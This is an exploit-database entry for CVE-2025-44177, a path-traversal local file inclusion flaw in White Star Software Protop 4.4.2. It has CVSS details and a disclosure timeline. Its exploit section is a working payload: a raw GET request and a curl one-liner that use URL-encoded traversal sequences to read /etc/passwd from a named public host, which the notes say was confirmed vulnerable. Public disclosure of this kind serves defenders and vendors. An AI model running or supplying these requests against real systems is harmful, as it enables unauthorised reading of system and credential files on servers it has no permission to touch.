Exploit Details
Basic Information
| Exploit Title | White Star Software Protop 4.4.2-2024-11-27 – Local File Inclusion (LFI) |
|---|---|
| Exploit ID | EDB-ID:52367 |
| Type | exploitdb |
| Published | 2025-07-16T00:00:00 |
| Modified | 2025-07-16T00:00:00 |
CVSS Information
| CVSS Score | 8.2 |
|---|---|
| Severity | HIGH |
| Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N |
CVE Information
- CVE-2025-44177
Exploit Description
Exploit Code
# Date: 2025-07-09
# Exploit Author: Imraan Khan (Lich-Sec)
# Vendor Homepage: https://wss.com/
# Software Link: https://client.protop.co.za/
# Version: v4.4.2-2024-11-27
# Tested on: Ubuntu 22.04 / Linux
# CVE: CVE-2025-44177
# CWE: CWE-22 – Path Traversal
# Description:
# A Local File Inclusion vulnerability exists in White Star Software Protop v4.4.2.
# An unauthenticated remote attacker can retrieve arbitrary files via
# URL-encoded traversal sequences in the `/pt3upd/` endpoint.
# Vulnerable Endpoint:
GET /pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: client.protop.co.za
User-Agent: curl/8.0
Accept: */*
# Example curl command:
curl -i ‘https://client.protop.co.za/pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd’
# Notes:
# – Vulnerability confirmed on public instance at time of testing.
# – CVSS v3.1 Base Score: 8.2 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N)
# – The vendor was notified and a fix was issued.
# Disclosure Timeline:
# – Discovered: 2025-03-13
# – Disclosed to vendor: 2025-03-20
# – CVE Assigned: 2025-07-01
# – Public Disclosure: 2025-07-09